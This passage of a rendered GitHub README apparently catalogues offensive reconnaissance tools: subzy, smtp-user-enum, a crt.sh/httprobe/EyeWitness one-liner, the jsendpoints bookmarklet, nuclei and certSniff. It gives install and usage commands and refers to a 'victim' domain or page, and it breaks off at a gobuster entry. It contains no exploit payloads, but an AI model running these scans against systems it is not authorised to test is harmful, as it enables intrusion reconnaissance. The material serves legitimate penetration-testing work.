class="anchor" aria-label="Permalink: 🔙subzy" href="#subzy"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Subdomain takeover tool which works based on matching response fingerprints from <a href="https://github.com/EdOverflow/can-i-take-over-xyz/blob/master/README.md">can-i-take-over-xyz</a>.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="go install -v github.com/PentestPad/subzy@latest"><pre>go install -v github.com/PentestPad/subzy@latest</pre></div> <p dir="auto">For full installation instructions see <a href="https://github.com/PentestPad/subzy?tab=readme-ov-file#installation">here</a>.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# List of subdomains ./subzy run --targets list.txt # Single or multiple targets ./subzy run --target test.google.com ./subzy run --target test.google.com,https://test.yahoo.com"><pre><span class="pl-c"><span class="pl-c">#</span> List of subdomains</span> ./subzy run --targets list.txt <span class="pl-c"><span class="pl-c">#</span> Single or multiple targets</span> ./subzy run --target test.google.com ./subzy run --target 
test.google.com,https://test.yahoo.com</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer" href="https://private-user-images.githubusercontent.com/100603074/423172554-d06bff41-8c0f-4d3d-b42e-1221b9866332.jpg?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNTU0LWQwNmJmZjQxLThjMGYtNGQzZC1iNDJlLTEyMjFiOTg2NjMzMi5qcGc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1mNGRkMDIzMzRmOTM3NTU4OGU2YzgwZjkzNjE5MjQ2MTk4Y2M5ZDYzNmQ2YTlhODY4MTQ4MWFlNzA5MDI4MTA2JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.2ORN7U6R7fK15z9ExKrw15ZRJDDWqjDDjoCYDvLGpFA"><img src="https://private-user-images.githubusercontent.com/100603074/423172554-d06bff41-8c0f-4d3d-b42e-1221b9866332.jpg?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNTU0LWQwNmJmZjQxLThjMGYtNGQzZC1iNDJlLTEyMjFiOTg2NjMzMi5qcGc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1mNGRkMDIzMzRmOTM3NTU4OGU2YzgwZjkzNjE5MjQ2MTk4Y2M5ZDYzNmQ2YTlhODY4MTQ4MWFlNzA5MDI4MTA2JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.2ORN7U6R7fK15z9ExKrw15ZRJDDWqjDDjoCYDvLGpFA" alt="subzy" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://www.geeksforgeeks.org/subzy-subdomain-takeover-vulnerability-checker-tool/" rel="nofollow">https://www.geeksforgeeks.org/subzy-subdomain-takeover-vulnerability-checker-tool/</a></em></p> <div 
class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/cytopia/smtp-user-enum">smtp-user-enum</a></h3><a id="user-content-smtp-user-enum" class="anchor" aria-label="Permalink: 🔙smtp-user-enum" href="#smtp-user-enum"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">SMTP user enumeration via VRFY, EXPN and RCPT with clever timeout, retry and reconnect functionality.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="pip install smtp-user-enum"><pre>pip install smtp-user-enum</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="smtp-user-enum [options] -u/-U host port smtp-user-enum --help smtp-user-enum --version"><pre>smtp-user-enum [options] -u/-U host port smtp-user-enum --help smtp-user-enum --version</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer" 
href="https://private-user-images.githubusercontent.com/100603074/423172510-2a965690-52f3-412a-90e3-54dd69e0b275.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNTEwLTJhOTY1NjkwLTUyZjMtNDEyYS05MGUzLTU0ZGQ2OWUwYjI3NS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT01ZmVlZGFmMGViM2U0OWY5ZmE5MDExODk2MDIyZTFjODlmNzQzYWE2YmZkMzczM2RhZmU0M2QxMzExZmRhMmMxJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.oM0zTt0NY9cj41OuU1Pj6Ofd5kQXIrnPvMbIsFpe4h4"><img src="https://private-user-images.githubusercontent.com/100603074/423172510-2a965690-52f3-412a-90e3-54dd69e0b275.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNTEwLTJhOTY1NjkwLTUyZjMtNDEyYS05MGUzLTU0ZGQ2OWUwYjI3NS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT01ZmVlZGFmMGViM2U0OWY5ZmE5MDExODk2MDIyZTFjODlmNzQzYWE2YmZkMzczM2RhZmU0M2QxMzExZmRhMmMxJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.oM0zTt0NY9cj41OuU1Pj6Ofd5kQXIrnPvMbIsFpe4h4" alt="smtp-user-enum" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://www.kali.org/tools/smtp-user-enum/" rel="nofollow">https://www.kali.org/tools/smtp-user-enum/</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>crt.sh -> httprobe -> EyeWitness</h3><a 
id="user-content-crtsh---httprobe---eyewitness" class="anchor" aria-label="Permalink: 🔙crt.sh -> httprobe -> EyeWitness" href="#crtsh---httprobe---eyewitness"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">I have put together a bash one-liner that:</p> <ul dir="auto"> <li>Passively collects a list of subdomains from certificate associations (<a href="https://crt.sh/" rel="nofollow">crt.sh</a>)</li> <li>Actively requests each subdomain to verify it's existence (<a href="https://github.com/tomnomnom/httprobe">httprobe</a>)</li> <li>Actively screenshots each subdomain for manual review (<a href="https://github.com/FortyNorthSecurity/EyeWitness">EyeWitness</a>)</li> </ul> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="domain=DOMAIN_COM;rand=$RANDOM;curl -fsSL "https://crt.sh/?q=${domain}" | pup 'td text{}' | grep "${domain}" | sort -n | uniq | httprobe > /tmp/enum_tmp_${rand}.txt; python3 /usr/share/eyewitness/EyeWitness.py -f /tmp/enum_tmp_${rand}.txt --web"><pre>domain=DOMAIN_COM<span class="pl-k">;</span>rand=<span class="pl-smi">$RANDOM</span><span class="pl-k">;</span>curl -fsSL <span class="pl-s"><span class="pl-pds">"</span>https://crt.sh/?q=<span class="pl-smi">${domain}</span><span 
class="pl-pds">"</span></span> <span class="pl-k">|</span> pup <span class="pl-s"><span class="pl-pds">'</span>td text{}<span class="pl-pds">'</span></span> <span class="pl-k">|</span> grep <span class="pl-s"><span class="pl-pds">"</span><span class="pl-smi">${domain}</span><span class="pl-pds">"</span></span> <span class="pl-k">|</span> sort -n <span class="pl-k">|</span> uniq <span class="pl-k">|</span> httprobe <span class="pl-k">></span> /tmp/enum_tmp_<span class="pl-smi">${rand}</span>.txt<span class="pl-k">;</span> python3 /usr/share/eyewitness/EyeWitness.py -f /tmp/enum_tmp_<span class="pl-smi">${rand}</span>.txt --web</pre></div> <p dir="auto"><em>Note: You must have <a href="https://github.com/tomnomnom/httprobe">httprobe</a>, <a href="https://github.com/EricChiang/pup">pup</a> and <a href="https://github.com/FortyNorthSecurity/EyeWitness">EyeWitness</a> installed and change 'DOMAIN_COM' to the target domain. Only the crt.sh query is passive: httprobe connects to every name in the list and EyeWitness then requests and screenshots each one, so confirm the list is in scope before those stages run. The <code>grep "${domain}"</code> is a plain (regex) substring match and crt.sh also returns wildcard <code>*.</code> entries, so unrelated and wildcard names should be stripped first. The candidate list is written to a world-readable <code>/tmp</code> file with a predictable name; on a shared host use <code>mktemp</code> or a working directory you control. You can run this script concurrently in separate terminal windows if you have multiple target root domains.</em></p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/192104474-5836138a-4a61-44fd-b3e3-b2a908c2928e.png"><img src="https://user-images.githubusercontent.com/100603074/192104474-5836138a-4a61-44fd-b3e3-b2a908c2928e.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/192104501-e038aff8-1e51-4cc3-a286-54e93408ed4e.png"><img src="https://user-images.githubusercontent.com/100603074/192104501-e038aff8-1e51-4cc3-a286-54e93408ed4e.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://twitter.com/renniepak/status/1602620834463588352" rel="nofollow">jsendpoints</a></h3><a id="user-content-jsendpoints" class="anchor" 
aria-label="Permalink: 🔙jsendpoints" href="#jsendpoints"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">A JavaScript bookmarklet for extracting all webpage endpoint links on a page.</p> <p dir="auto">Created by <a href="https://twitter.com/renniepak" rel="nofollow">@renniepak</a>, this JavaScript code snippet can be used to extract all endpoints (starting with /) from the current webpage DOM including all external script sources embedded on the webpage.</p> <div class="highlight highlight-source-js notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="javascript:(function(){var scripts=document.getElementsByTagName("script"),regex=/(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))/g;const results=new Set;for(var i=0;i<scripts.length;i++){var t=scripts[i].src;""!=t&&fetch(t).then(function(t){return t.text()}).then(function(t){var e=t.matchAll(regex);for(let r of e)results.add(r[0])}).catch(function(t){console.log("An error occurred: ",t)})}var pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);for(const match of matches)results.add(match[0]);function writeResults(){results.forEach(function(t){document.write(t+"<br>")})}setTimeout(writeResults,3e3);})();"><pre>javascript:<span class="pl-kos">(</span><span class="pl-k">function</span><span class="pl-kos">(</span><span 
class="pl-kos">)</span><span class="pl-kos">{</span><span class="pl-k">var</span> <span class="pl-s1">scripts</span><span class="pl-c1">=</span><span class="pl-smi">document</span><span class="pl-kos">.</span><span class="pl-en">getElementsByTagName</span><span class="pl-kos">(</span><span class="pl-s">"script"</span><span class="pl-kos">)</span><span class="pl-kos">,</span><span class="pl-s1">regex</span><span class="pl-c1">=</span><span class="pl-pds"><span class="pl-c1">/</span><span class="pl-kos">(?<</span><span class="pl-c1">=</span><span class="pl-kos">(</span><span class="pl-cce">\"</span><span class="pl-c1">|</span><span class="pl-cce">\'</span><span class="pl-c1">|</span><span class="pl-cce">\`</span><span class="pl-kos">)</span><span class="pl-kos">)</span><span class="pl-cce">\/</span><span class="pl-kos">[</span><span class="pl-c1">a</span><span class="pl-c1">-</span><span class="pl-c1">z</span><span class="pl-c1">A</span><span class="pl-c1">-</span><span class="pl-c1">Z</span><span class="pl-c1">0</span><span class="pl-c1">-</span><span class="pl-c1">9</span><span class="pl-c1">_</span><span class="pl-c1">?</span><span class="pl-c1">&</span><span class="pl-c1">=</span><span class="pl-cce">\/</span><span class="pl-cce">\-</span><span class="pl-cce">\#</span><span class="pl-cce">\.</span><span class="pl-kos">]</span><span class="pl-c1">*</span><span class="pl-kos">(?</span><span class="pl-c1">=</span><span class="pl-kos">(</span><span class="pl-cce">\"</span><span class="pl-c1">|</span><span class="pl-cce">\'</span><span class="pl-c1">|</span><span class="pl-cce">\`</span><span class="pl-kos">)</span><span class="pl-kos">)</span><span class="pl-c1">/</span>g</span><span class="pl-kos">;</span><span class="pl-k">const</span> <span class="pl-s1">results</span><span class="pl-c1">=</span><span class="pl-k">new</span> <span class="pl-v">Set</span><span class="pl-kos">;</span><span class="pl-k">for</span><span class="pl-kos">(</span><span 
class="pl-k">var</span> <span class="pl-s1">i</span><span class="pl-c1">=</span><span class="pl-c1">0</span><span class="pl-kos">;</span><span class="pl-s1">i</span><span class="pl-c1"><</span><span class="pl-s1">scripts</span><span class="pl-kos">.</span><span class="pl-c1">length</span><span class="pl-kos">;</span><span class="pl-s1">i</span><span class="pl-c1">++</span><span class="pl-kos">)</span><span class="pl-kos">{</span><span class="pl-k">var</span> <span class="pl-s1">t</span><span class="pl-c1">=</span><span class="pl-s1">scripts</span><span class="pl-kos">[</span><span class="pl-s1">i</span><span class="pl-kos">]</span><span class="pl-kos">.</span><span class="pl-c1">src</span><span class="pl-kos">;</span><span class="pl-s">""</span><span class="pl-c1">!=</span><span class="pl-s1">t</span><span class="pl-c1">&&</span><span class="pl-en">fetch</span><span class="pl-kos">(</span><span class="pl-s1">t</span><span class="pl-kos">)</span><span class="pl-kos">.</span><span class="pl-en">then</span><span class="pl-kos">(</span><span class="pl-k">function</span><span class="pl-kos">(</span><span class="pl-s1">t</span><span class="pl-kos">)</span><span class="pl-kos">{</span><span class="pl-k">return</span> <span class="pl-s1">t</span><span class="pl-kos">.</span><span class="pl-en">text</span><span class="pl-kos">(</span><span class="pl-kos">)</span><span class="pl-kos">}</span><span class="pl-kos">)</span><span class="pl-kos">.</span><span class="pl-en">then</span><span class="pl-kos">(</span><span class="pl-k">function</span><span class="pl-kos">(</span><span class="pl-s1">t</span><span class="pl-kos">)</span><span class="pl-kos">{</span><span class="pl-k">var</span> <span class="pl-s1">e</span><span class="pl-c1">=</span><span class="pl-s1">t</span><span class="pl-kos">.</span><span class="pl-en">matchAll</span><span class="pl-kos">(</span><span class="pl-s1">regex</span><span class="pl-kos">)</span><span class="pl-kos">;</span><span 
class="pl-k">for</span><span class="pl-kos">(</span><span class="pl-k">let</span> <span class="pl-s1">r</span> <span class="pl-k">of</span> <span class="pl-s1">e</span><span class="pl-kos">)</span><span class="pl-s1">results</span><span class="pl-kos">.</span><span class="pl-en">add</span><span class="pl-kos">(</span><span class="pl-s1">r</span><span class="pl-kos">[</span><span class="pl-c1">0</span><span class="pl-kos">]</span><span class="pl-kos">)</span><span class="pl-kos">}</span><span class="pl-kos">)</span><span class="pl-kos">.</span><span class="pl-en">catch</span><span class="pl-kos">(</span><span class="pl-k">function</span><span class="pl-kos">(</span><span class="pl-s1">t</span><span class="pl-kos">)</span><span class="pl-kos">{</span><span class="pl-smi">console</span><span class="pl-kos">.</span><span class="pl-en">log</span><span class="pl-kos">(</span><span class="pl-s">"An error occurred: "</span><span class="pl-kos">,</span><span class="pl-s1">t</span><span class="pl-kos">)</span><span class="pl-kos">}</span><span class="pl-kos">)</span><span class="pl-kos">}</span><span class="pl-k">var</span> <span class="pl-s1">pageContent</span><span class="pl-c1">=</span><span class="pl-smi">document</span><span class="pl-kos">.</span><span class="pl-c1">documentElement</span><span class="pl-kos">.</span><span class="pl-c1">outerHTML</span><span class="pl-kos">,</span><span class="pl-s1">matches</span><span class="pl-c1">=</span><span class="pl-s1">pageContent</span><span class="pl-kos">.</span><span class="pl-en">matchAll</span><span class="pl-kos">(</span><span class="pl-s1">regex</span><span class="pl-kos">)</span><span class="pl-kos">;</span><span class="pl-k">for</span><span class="pl-kos">(</span><span class="pl-k">const</span> <span class="pl-s1">match</span> <span class="pl-k">of</span> <span class="pl-s1">matches</span><span class="pl-kos">)</span><span class="pl-s1">results</span><span class="pl-kos">.</span><span class="pl-en">add</span><span 
class="pl-kos">(</span><span class="pl-s1">match</span><span class="pl-kos">[</span><span class="pl-c1">0</span><span class="pl-kos">]</span><span class="pl-kos">)</span><span class="pl-kos">;</span><span class="pl-k">function</span> <span class="pl-en">writeResults</span><span class="pl-kos">(</span><span class="pl-kos">)</span><span class="pl-kos">{</span><span class="pl-s1">results</span><span class="pl-kos">.</span><span class="pl-en">forEach</span><span class="pl-kos">(</span><span class="pl-k">function</span><span class="pl-kos">(</span><span class="pl-s1">t</span><span class="pl-kos">)</span><span class="pl-kos">{</span><span class="pl-smi">document</span><span class="pl-kos">.</span><span class="pl-en">write</span><span class="pl-kos">(</span><span class="pl-s1">t</span><span class="pl-c1">+</span><span class="pl-s">"<br>"</span><span class="pl-kos">)</span><span class="pl-kos">}</span><span class="pl-kos">)</span><span class="pl-kos">}</span><span class="pl-en">setTimeout</span><span class="pl-kos">(</span><span class="pl-s1">writeResults</span><span class="pl-kos">,</span><span class="pl-c1">3e3</span><span class="pl-kos">)</span><span class="pl-kos">;</span><span class="pl-kos">}</span><span class="pl-kos">)</span><span class="pl-kos">(</span><span class="pl-kos">)</span><span class="pl-kos">;</span></pre></div> <p dir="auto"><strong>Usage (Bookmarklet)</strong></p> <p dir="auto">Create a bookmarklet...</p> <ul dir="auto"> <li><code>Right click your bookmark bar</code></li> <li><code>Click 'Add Page'</code></li> <li><code>Paste the above Javascript in the 'url' box</code></li> <li><code>Click 'Save'</code></li> </ul> <p dir="auto">...then visit the victim page in the browser and click the bookmarklet.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/207563211-6c69711a-f7e7-4451-862b-80c9849df7fe.png"><img 
src="https://user-images.githubusercontent.com/100603074/207563211-6c69711a-f7e7-4451-862b-80c9849df7fe.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><strong>Usage (Console)</strong></p> <p dir="auto">Paste the above Javascript into the console window <code>F12</code> and press enter.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/207563598-d70171b5-823e-491e-a6d5-8657af28b0e5.png"><img src="https://user-images.githubusercontent.com/100603074/207563598-d70171b5-823e-491e-a6d5-8657af28b0e5.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/projectdiscovery/nuclei">nuclei</a></h3><a id="user-content-nuclei" class="anchor" aria-label="Permalink: 🔙nuclei" href="#nuclei"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Fast vulnerability scanner that uses .yaml templates to search for specific issues.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest"><pre>go install -v 
github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="cat domains.txt | nuclei -t /PATH/nuclei-templates/"><pre>cat domains.txt <span class="pl-k">|</span> nuclei -t /PATH/nuclei-templates/</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/205439027-2afe4ef8-fc7a-410d-934f-f8d325a8176e.png"><img src="https://user-images.githubusercontent.com/100603074/205439027-2afe4ef8-fc7a-410d-934f-f8d325a8176e.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/A-poc/certSniff">certSniff</a></h3><a id="user-content-certsniff" class="anchor" aria-label="Permalink: 🔙certSniff" href="#certsniff"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">certSniff is a Certificate Transparency logs keyword watcher I wrote in Python. 
It uses the certstream library to watch for certificate creation logs that contain keywords defined in a file.</p> <p dir="auto">You can set this running with several keywords relating to your victim domain; any certificate creations will be recorded and may lead to the discovery of domains you were previously unaware of.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/A-poc/certSniff;cd certSniff/;pip install -r requirements.txt"><pre>git clone https://github.com/A-poc/certSniff<span class="pl-k">;</span><span class="pl-c1">cd</span> certSniff/<span class="pl-k">;</span>pip install -r requirements.txt</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-python notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="python3 certSniff.py -f example.txt"><pre><span class="pl-s1">python3</span> <span class="pl-s1">certSniff</span>.<span class="pl-c1">py</span> <span class="pl-c1">-</span><span class="pl-s1">f</span> <span class="pl-s1">example</span>.<span class="pl-c1">txt</span></pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/223851512-068261fa-7070-4307-852c-7ef46d938b18.png"><img src="https://user-images.githubusercontent.com/100603074/223851512-068261fa-7070-4307-852c-7ef46d938b18.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://www.kali.org/tools/gobuster/" rel="nofollow">gobuster</a></h3><a id="user-content-gobuster" class="anchor" aria-label="Permalink: 🔙gobuster" href="#gobuster"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path 
